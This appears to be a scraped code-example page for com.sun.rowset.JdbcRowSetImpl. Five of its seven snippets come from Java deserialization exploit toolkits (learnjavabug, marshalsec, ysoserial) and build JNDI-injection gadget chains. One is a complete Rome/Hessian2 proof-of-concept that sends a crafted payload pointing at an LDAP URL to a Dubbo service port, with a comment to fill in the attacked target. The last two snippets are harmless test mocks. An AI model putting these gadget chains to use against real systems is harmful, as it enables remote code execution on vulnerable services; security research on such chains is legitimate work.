Java Code Examples for com.sun.rowset.JdbcRowSetImpl

The following examples show how to use com.sun.rowset.JdbcRowSetImpl. These examples are extracted from open source projects. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source Project: learnjavabug   Source File: JDKUtil.java    License: MIT License 5 votes vote down vote up
public static JdbcRowSetImpl makeJNDIRowSet ( String jndiUrl ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(jndiUrl);
    rs.setMatchColumn("foo");
    Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
    return rs;
}
 
Example 2
Source Project: marshalsec   Source File: JDKUtil.java    License: MIT License 5 votes vote down vote up
public static JdbcRowSetImpl makeJNDIRowSet ( String jndiUrl ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(jndiUrl);
    rs.setMatchColumn("foo");
    Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
    return rs;
}
 
Example 3
Source Project: learnjavabug   Source File: RomePoc.java    License: MIT License 4 votes vote down vote up
public static void main(String[] args) throws Exception {
  JdbcRowSetImpl rs = new JdbcRowSetImpl();
  //todo 此处填写ldap url
  rs.setDataSourceName("ldap://127.0.0.1:43658/Calc");
  rs.setMatchColumn("foo");
  Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);

  ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs);
  EqualsBean root = new EqualsBean(ToStringBean.class, item);

  HashMap s = new HashMap<>();
  Reflections.setFieldValue(s, "size", 2);
  Class<?> nodeC;
  try {
    nodeC = Class.forName("java.util.HashMap$Node");
  }
  catch ( ClassNotFoundException e ) {
    nodeC = Class.forName("java.util.HashMap$Entry");
  }
  Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
  nodeCons.setAccessible(true);

  Object tbl = Array.newInstance(nodeC, 2);
  Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null));
  Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null));
  Reflections.setFieldValue(s, "table", tbl);

  ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

  // header.
  byte[] header = new byte[16];
  // set magic number.
  Bytes.short2bytes((short) 0xdabb, header);
  // set request and serialization flag.
  header[2] = (byte) ((byte) 0x80 | 0x20 | 2);

  // set request id.
  Bytes.long2bytes(new Random().nextInt(100000000), header, 4);

  ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
  Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
  NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
  sf.setAllowNonSerializable(true);
  out.setSerializerFactory(sf);

  out.writeObject(s);

  out.flushBuffer();
  if (out instanceof Cleanable) {
    ((Cleanable) out).cleanup();
  }

  Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
  byteArrayOutputStream.write(header);
  byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());

  byte[] bytes = byteArrayOutputStream.toByteArray();

  //todo 此处填写被攻击的dubbo服务提供者地址和端口
  Socket socket = new Socket("127.0.0.1", 20880);
  OutputStream outputStream = socket.getOutputStream();
  outputStream.write(bytes);
  outputStream.flush();
  outputStream.close();
}
 
Example 4
Source Project: ysoserial-modified   Source File: Hibernate2.java    License: MIT License 4 votes vote down vote up
public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(cmdHelper.getCommand());
    return Hibernate1.makeCaller(rs,Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData") );
}
 
Example 5
Source Project: ysoserial   Source File: Hibernate2.java    License: MIT License 4 votes vote down vote up
public Object getObject ( String command ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(command);
    return Hibernate1.makeCaller(rs,Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData") );
}
 
Example 6
Source Project: incubator-gobblin   Source File: JdbcWriterCommandsTest.java    License: Apache License 2.0 4 votes vote down vote up
private ResultSet createMockResultSet() {
  final List<Map<String, String>> expected = new ArrayList<>();
  Map<String, String> entry = new HashMap<>();
  entry.put("column_name", "name");
  entry.put("column_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_number");
  entry.put("column_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_color");
  entry.put("column_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "date_of_birth");
  entry.put("column_type", "date");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "last_modified");
  entry.put("column_type", "time");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "created");
  entry.put("column_type", "timestamp");
  expected.add(entry);

  return new JdbcRowSetImpl(){
    private Iterator<Map<String, String>> it = expected.iterator();
    private Map<String, String> curr = null;

    @Override
    public boolean first() {
      it = expected.iterator();
      return next();
    }

    @Override
    public boolean next() {
      if(it.hasNext()) {
        curr = it.next();
        return true;
      }
      return false;
    }

    @Override
    public String getString(String columnLabel) throws SQLException {
      if (curr == null) {
        throw new SQLException("NPE on current cursor.");
      }
      String val = curr.get(columnLabel);
      if (val == null) {
        throw new SQLException(columnLabel + " does not exist.");
      }
      return val;
    }
  };
}
 
Example 7
private ResultSet createMockResultSet() {
  final List<Map<String, String>> expected = new ArrayList<>();
  Map<String, String> entry = new HashMap<>();
  entry.put("column_name", "name");
  entry.put("data_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_number");
  entry.put("data_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_color");
  entry.put("data_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "date_of_birth");
  entry.put("data_type", "date");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "last_modified");
  entry.put("data_type", "time without time zone");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "created");
  entry.put("data_type", "timestamp with time zone");
  expected.add(entry);

  return new JdbcRowSetImpl() {
    private Iterator<Map<String, String>> it = expected.iterator();
    private Map<String, String> curr = null;

    @Override
    public boolean first() {
      it = expected.iterator();
      return next();
    }

    @Override
    public boolean next() {
      if (it.hasNext()) {
        curr = it.next();
        return true;
      }
      return false;
    }

    @Override
    public String getString(String columnLabel)
        throws SQLException {
      if (curr == null) {
        throw new SQLException("NPE on current cursor.");
      }
      String val = curr.get(columnLabel);
      if (val == null) {
        throw new SQLException(columnLabel + " does not exist.");
      }
      return val;
    }
  };
}